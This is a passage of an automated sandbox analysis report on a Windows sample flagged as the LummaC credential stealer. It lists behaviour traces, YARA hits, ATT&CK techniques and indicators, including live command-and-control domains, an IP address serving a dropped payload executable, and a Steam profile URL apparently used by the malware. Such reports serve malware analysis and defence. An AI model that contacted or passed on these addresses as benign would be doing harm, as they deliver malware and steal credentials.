                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_024CB9D5
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_004103CD
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,0_2_004163EA
                  Source: C:\Users\user\AppData\Local\Temp\91B1.tmp.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.7.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.7.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 3.2.91B1.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.91B1.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.91B1.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.91B1.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1390576306.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 3.2.91B1.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.91B1.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.91B1.tmp.exe.24e0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.3.91B1.tmp.exe.24e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.1390576306.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218CC
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420BF6
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024B1B33 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_024B1B33
                  Source: C:\Users\user\Desktop\hpEAJnNwCB.exeCode function: 0_2_024B0E5D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_024B0E5D

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		11
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Screen Capture                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  PowerShell                  		Boot or Logon Initialization Scripts1
                  DLL Side-Loading                  		1
                  Virtualization/Sandbox Evasion                  		LSASS Memory1
                  Query Registry                  		Remote Desktop Protocol1
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                  Process Injection                  		Security Account Manager31
                  Security Software Discovery                  		SMB/Windows Admin Shares3
                  Clipboard Data                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Deobfuscate/Decode Files or Information                  		NTDS1
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture124
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
                  Obfuscated Files or Information                  		LSA Secrets1
                  Process Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts22
                  Software Packing                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading                  		DCSync2
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576575 Sample: hpEAJnNwCB.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 26 effecterectz.xyz 2->26 28 diffuculttan.xyz 2->28 30 8 other IPs or domains 2->30 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 50 10 other signatures 2->50 8 hpEAJnNwCB.exe 1 17 2->8         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 dnsIp5 32 176.113.115.19, 49715, 80 SELECTELRU Russian Federation 8->32 34 post-to-me.com 104.21.56.70, 443, 49709 CLOUDFLARENETUS United States 8->34 22 C:\Users\user\AppData\Local\...\91B1.tmp.exe, PE32 8->22 dropped 24 C:\Users\user\...\ScreenUpdateSync[1].exe, PE32 8->24 dropped 52 Detected unpacking (overwrites its own PE header) 8->52 13 91B1.tmp.exe 8->13         started        file6 signatures7 process8 dnsIp9 36 deafeninggeh.biz 104.131.68.180, 443, 49748 DIGITALOCEAN-ASNUS United States 13->36 38 immureprech.biz 45.77.249.79, 443, 49736 AS-CHOOPAUS United States 13->38 40 steamcommunity.com 104.121.10.34, 443, 49756 AKAMAI-ASUS United States 13->40 54 Detected unpacking (changes PE section rights) 13->54 56 Detected unpacking (overwrites its own PE header) 13->56 58 Machine Learning detection for dropped file 13->58 17 WerFault.exe 19 16 13->17         started        signatures10 process11 file12 20 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->20 dropped

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  hpEAJnNwCB.exe40%VirustotalBrowse
                  hpEAJnNwCB.exe45%ReversingLabs
                  hpEAJnNwCB.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\ScreenUpdateSync[1].exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\91B1.tmp.exe100%Joe Sandbox ML

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://effecterectz.xyz/apim100%Avira URL Cloudmalware
                  https://effecterectz.xyz/0g100%Avira URL Cloudmalware
                  https://post-to-me.com/track_prt.php?sub=0&cc=DE~100%Avira URL Cloudmalware
                  https://deafeninggeh.biz/apiV100%Avira URL Cloudmalware
                  http://176.113.115.19/0%Avira URL Cloudsafe
                  http://176.113.115.19/ScreenUpdateSync.exey00%Avira URL Cloudsafe
                  https://effecterectz.xyz/apim18%VirustotalBrowse
                  http://176.113.115.19/$00%Avira URL Cloudsafe
                  http://176.113.115.19/ScreenUpdateSync.exeWX0%Avira URL Cloudsafe
                  https://post-to-me.com/track_prt.php?sub=0&cc=DE6100%Avira URL Cloudmalware
                  http://176.113.115.19/ScreenUpdateSync.exel00%Avira URL Cloudsafe
                  https://effecterectz.xyz/P100%Avira URL Cloudmalware
                  https://effecterectz.x0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  post-to-me.com
                  		104.21.56.70
                  		truefalse
                    		high
                    steamcommunity.com
                    		104.121.10.34
                    		truefalse
                      		high
                      immureprech.biz
                      		45.77.249.79
                      		truefalse
                        		high
                        deafeninggeh.biz
                        		104.131.68.180
                        		truefalse
                          		high
                          sordid-snaked.cyou
                          		unknown
                          		unknownfalse
                            		high
                            diffuculttan.xyz
                            		unknown
                            		unknownfalse
                              		high
                              effecterectz.xyz
                              		unknown
                              		unknownfalse
                                		high
                                awake-weaves.cyou
                                		unknown
                                		unknownfalse
                                  		high
                                  wrathful-jammy.cyou
                                  		unknown
                                  		unknownfalse
                                    		high
                                    debonairnukk.xyz
                                    		unknown
                                    		unknownfalse
                                      		high

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      sordid-snaked.cyoufalse
                                        		high
                                        deafeninggeh.bizfalse
                                          		high
                                          effecterectz.xyzfalse
                                            		high
                                            wrathful-jammy.cyoufalse
                                              		high
                                              https://steamcommunity.com/profiles/76561199724331900false
                                                		high
                                                awake-weaves.cyoufalse
                                                  		high
                                                  immureprech.bizfalse
                                                    		high
                                                    https://immureprech.biz/apifalse
                                                      		high
                                                      debonairnukk.xyzfalse
                                                        		high
                                                        diffuculttan.xyzfalse
                                                          		high
                                                          https://post-to-me.com/track_prt.php?sub=0&cc=DEfalse
                                                            		high
                                                            https://deafeninggeh.biz/apifalse
                                                              		high

                                                              URLs from Memory and Binaries

                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                              https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://player.vimeo.com91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://immureprech.biz/91B1.tmp.exe, 00000003.00000003.1471571879.0000000000949000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://effecterectz.xyz/0g91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    		unknown
                                                                    https://steamcommunity.com/?subsection=broadcasts91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://store.steampowered.com/points/shopr91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://store.steampowered.com/subscriber_agreement/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.gstatic.cn/recaptcha/91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://176.113.115.19/ScreenUpdateSync.exehpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.valvesoftware.com/legal.htm91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://effecterectz.xyz/apim91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • 18%, Virustotal, Browse
                                                                                  • Avira URL Cloud: malware
                                                                                  		unknown
                                                                                  https://www.youtube.com91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.com91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af691B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=Cx79WC7T91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://diffuculttan.xyz/api91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://s.ytimg.com;91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=191B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://deafeninggeh.biz/apiV91B1.tmp.exe, 00000003.00000003.1471777878.000000000097A000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1471854297.0000000000982000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: malware
                                                                                                          		unknown
                                                                                                          http://176.113.115.19/hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BAC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://community.fastly.steamstatic.com/91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://steam.tv/91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://post-to-me.com/track_prt.php?sub=&cc=DEhpEAJnNwCB.exe, 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://post-to-me.com/track_prt.php?sub=0&cc=DE~hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: malware
                                                                                                                  		unknown
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=foEB91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://store.steampowered.com/privacy_agreement/91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://store.steampowered.com/points/shop/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://sketchfab.com91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://lv.queniujq.cn91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.youtube.com/91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://steamcommunity.com:443/profiles/76561199724331900ffuculttan.xyz91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://store.steampowered.com/privacy_agreement/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://post-to-me.com/track_prt.php?sub=hpEAJnNwCB.exefalse
                                                                                                                                    		high
                                                                                                                                    http://176.113.115.19/ScreenUpdateSync.exey0hpEAJnNwCB.exe, 00000000.00000002.3745877120.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    		unknown
                                                                                                                                    https://steamcommunity.com/h.91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.google.com/recaptcha/91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://checkout.steampowered.com/91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://post-to-me.com/hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://176.113.115.19/$0hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              https://store.steampowered.com/;91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://176.113.115.19/ScreenUpdateSync.exeWXhpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://store.steampowered.com/about/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://steamcommunity.com/my/wishlist/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://post-to-me.com/track_prt.php?sub=0&cc=DE6hpEAJnNwCB.exe, 00000000.00000003.3613575394.0000000000B80000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000002.3745614627.0000000000B80000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      		unknown
                                                                                                                                                      https://help.steampowered.com/en/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://steamcommunity.com/market/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://store.steampowered.com/news/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://store.steampowered.com/subscriber_agreement/91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org91B1.tmp.exe, 00000003.00000002.1759214723.0000000000936000.00000004.00000020.00020000.00000000.sdmp, 91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://recaptcha.net/recaptcha/;91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://176.113.115.19/ScreenUpdateSync.exel0hpEAJnNwCB.exe, 00000000.00000002.3745877120.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.1362746169.0000000000BC3000.00000004.00000020.00020000.00000000.sdmp, hpEAJnNwCB.exe, 00000000.00000003.3613315762.0000000000BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://steamcommunity.com/discussions/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://store.steampowered.com/stats/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://effecterectz.x91B1.tmp.exe, 00000003.00000003.1471571879.0000000000953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://medal.tv91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://broadcast.st.dl.eccdnx.com91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://store.steampowered.com/steam_refunds/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F7656119972433190091B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=96201691B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://steamcommunity.com/workshop/91B1.tmp.exe, 00000003.00000003.1508407827.00000000009CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://login.steampowered.com/91B1.tmp.exe, 00000003.00000002.1759214723.000000000097A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
